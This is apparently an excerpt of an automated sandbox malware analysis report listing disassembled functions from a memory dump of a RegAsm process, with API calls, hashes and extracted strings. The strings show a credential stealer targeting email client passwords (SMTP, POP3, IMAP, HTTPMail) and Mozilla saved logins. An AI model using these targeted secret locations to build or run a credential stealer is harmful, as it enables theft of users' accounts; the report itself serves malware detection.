                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00406E23
                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406E34
                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00406E41
                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406E54
                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00406E63
                                                                                                                                                                                                                      • SetClipboardData.USER32(00000001,00000000), ref: 00406E6C
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00406E74
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00406E80
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00406E8B
                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00406E94
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3604893535-0
                                                                                                                                                                                                                      • Opcode ID: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                                                                                                                                                      • Instruction ID: a08a85c5be877f1b118c2cb4fdaf5607b5944e2b5e0e57495ee86e8d77b21b2f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9114F39501205EFE7506FB4EC8CB9E7BB8EF05315F144175F506E22A1DB3489158AA9
                                                                                                                                                                                                                      Function 00406E9F Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemorystringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 00406EA7
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406EB4
                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C360,?), ref: 00406EC3
                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00406ED0
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000001,?,?,?,?,0040C360,?), ref: 00406ED9
                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00406EE2
                                                                                                                                                                                                                      • SetClipboardData.USER32(00000001,00000000), ref: 00406EEB
                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00406EFB
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3116012682-0
                                                                                                                                                                                                                      • Opcode ID: 1f4c6f9f90a19b00bc9d76a8b9f701475e5d8083360905b26116392cc3d2db55
                                                                                                                                                                                                                      • Instruction ID: 469d781c3ef94e65abf7249e996c377109e97d6fa28bdd4c6fbc6e531372765c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f4c6f9f90a19b00bc9d76a8b9f701475e5d8083360905b26116392cc3d2db55
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FFF0BB3F1002196BD2502FA5FC8CE5B776CDB85B56709413DF906D2252DE34980447F9
                                                                                                                                                                                                                      Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                                                                                      • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                                                                                      • API String ID: 3963849919-1658304561
                                                                                                                                                                                                                      • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                                                                                      • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                                                                                                                                      Function 004016FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                      • String ID: (yE$(yE$(yE
                                                                                                                                                                                                                      • API String ID: 1865533344-362086290
                                                                                                                                                                                                                      • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                                                                                                                                      • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                                                                                                                                      Function 00442D8E Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004431AD
                                                                                                                                                                                                                      • strncmp.MSVCRT ref: 004431BD
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000002,00000000,?,?,?,?), ref: 00443239
                                                                                                                                                                                                                      • atoi.MSVCRT(00000000,?,00000002,00000000,?,?,?,?), ref: 0044324A
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00443276
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                                                                                                                                                                      • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                                                                                                                      • API String ID: 1895597112-3210201812
                                                                                                                                                                                                                      • Opcode ID: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
                                                                                                                                                                                                                      • Instruction ID: 70136e13f872b1b8ab9f6622f700308096b0d0b5c52b82b67a7483c56e51dea4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AF10B718012589BDB22CF54C8487DEBBB4BB0278BF5485CAD8597B242C7B85B8DCF58
                                                                                                                                                                                                                      Function 00443C71 Relevance: 69.3, APIs: 23, Strings: 23, Instructions: 313stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                                                                                                                      • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                                                                                      • API String ID: 1714764973-479759155
                                                                                                                                                                                                                      • Opcode ID: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                                                                                                                                                                                      • Instruction ID: 3e95309f0516475de87f4a3b36a82bfae981417ea13aa6096d07c622cb899a74
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB91A9726087056AF224BB36DD43B9F33D8EF4071DF20042FF85AA6182EE6DBA05461D
                                                                                                                                                                                                                      Function 0040E934 Relevance: 68.7, APIs: 26, Strings: 13, Instructions: 483COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040EBD8
                                                                                                                                                                                                                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040EC2B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040EC47
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040ECDD
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040ECF2
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040EDE1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                                                                                      • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                                                                      • API String ID: 3137614212-1455797042
                                                                                                                                                                                                                      • Opcode ID: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                                                                                                                                                      • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                                                                                                                                                                      Function 0040DD7B Relevance: 66.3, APIs: 28, Strings: 16, Instructions: 303stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _strcmpi$strlen$strncmp$atoimemcpy$memset
                                                                                                                                                                                                                      • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                                                                                                                                                                                                      • API String ID: 2814039832-2206097438
                                                                                                                                                                                                                      • Opcode ID: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
                                                                                                                                                                                                                      • Instruction ID: f11149d289dc999bf060bfe26817f696df6097fe02de34603fea895fe08660a4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11A1C932804206BAFF14ABA6DD02B9E77A4DF50328F20447FF405B71D1EB79AE55964C
                                                                                                                                                                                                                      Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                                                        • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                                                                                                                        • Part of subcall function 00408934: CloseHandle.KERNEL32(?), ref: 0040899C
                                                                                                                                                                                                                        • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E5B8
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E5CD
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E6B5
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E6CC
                                                                                                                                                                                                                        • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                                                                                                                        • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E736
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E74F
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040E76D
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040E788
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E858
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040E873
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                                                                                      • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                                                                      • API String ID: 4171719235-3943159138
                                                                                                                                                                                                                      • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                                                                                                                                      • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                                                                                                                                      Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                                                                                                                      • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                                                                                                                      • GetDC.USER32 ref: 004104E2
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00410522
                                                                                                                                                                                                                      • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                                                                                                                      • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00410640
                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                      • API String ID: 1703216249-3046471546
                                                                                                                                                                                                                      • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                                                                                                                                      • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                                                                                                                                      Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004024F5
                                                                                                                                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,?,?,?,770145ED,?,00000000), ref: 00402533
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy$QueryValuememset
                                                                                                                                                                                                                      • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                                                                      • API String ID: 168965057-606283353
                                                                                                                                                                                                                      • Opcode ID: 81b74bbce62fc48dbc6e5ab3d42279a8276b8e6c9832af4fe3da39f0be11b360
                                                                                                                                                                                                                      • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81b74bbce62fc48dbc6e5ab3d42279a8276b8e6c9832af4fe3da39f0be11b360
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                                                                                                                                      Function 0040FC40 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                                                                                                                                                      • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FCFD
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FD1D
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FD3B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FD54
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FD72
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FD8B
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FE45
                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040FF0F
                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                                                                                                                                                      • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                                                                                                                                                      • {Unknown}, xrefs: 0040FD02
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                                                                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                                                                                      • API String ID: 1428123949-3474136107
